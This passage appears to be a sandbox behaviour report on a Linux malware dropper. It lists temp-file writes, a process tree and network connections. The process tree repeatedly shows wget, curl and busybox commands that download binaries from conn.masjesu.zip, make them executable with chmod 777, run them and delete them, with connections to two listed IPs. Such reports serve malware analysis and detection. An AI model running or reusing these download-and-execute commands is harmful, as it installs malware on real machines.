N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /usr/bin/curl N/A
File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /usr/bin/curl N/A
File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /usr/bin/curl N/A
File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /usr/bin/curl N/A
File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /usr/bin/curl N/A
File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /usr/bin/curl N/A
File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /usr/bin/curl N/A
File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /usr/bin/curl N/A
File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /usr/bin/curl N/A
File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /usr/bin/curl N/A
File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /usr/bin/curl N/A
File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /usr/bin/curl N/A
File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /usr/bin/curl N/A
File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /usr/bin/curl N/A
File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /usr/bin/curl N/A
File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /usr/bin/curl N/A
File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /usr/bin/curl N/A
File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /usr/bin/curl N/A
File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /usr/bin/curl N/A
File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /usr/bin/curl N/A
File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /usr/bin/curl N/A
File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /usr/bin/curl N/A
File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /usr/bin/curl N/A
File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /usr/bin/curl N/A
File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /usr/bin/curl N/A
File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /usr/bin/curl N/A
File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /usr/bin/curl N/A
File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /usr/bin/curl N/A

Processes

/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/chmod

[chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

[./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/rm

[rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/chmod

[chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF

[./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/rm

[rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/chmod

[chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB

[./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/rm

[rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/chmod

[chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o

[./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/rm

[rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/chmod

[chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey

[./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/rm

[rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/chmod

[chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod

[./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/rm

[rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/chmod

[chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG

[./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/rm

[rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/chmod

[chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4

[./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/rm

[rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/chmod

[chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq

[./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/rm

[rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/chmod

[chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca

[./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/rm

[rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/chmod

[chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp

[./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/rm

[rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/chmod

[chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n

[./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/rm

[rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/chmod

[chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL

[./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/rm

[rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/chmod

[chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz

[./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/rm

[rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/chmod

[chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp

[./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/rm

[rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/chmod

[chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n

[./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/rm

[rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/chmod

[chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL

[./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/rm

[rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/chmod

[chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz

[./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/rm

[rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/chmod

[chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o

[./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/rm

[rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/chmod

[chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

[./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/rm

[rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/chmod

[chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF

[./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/rm

[rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/chmod

[chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB

[./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/rm

[rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/chmod

[chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca

[./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/rm

[rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/chmod

[chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey

[./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/rm

[rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/chmod

[chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod

[./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/rm

[rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/chmod

[chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG

[./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/rm

[rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/chmod

[chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4

[./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/rm

[rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/chmod

[chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq

[./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/rm

[rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
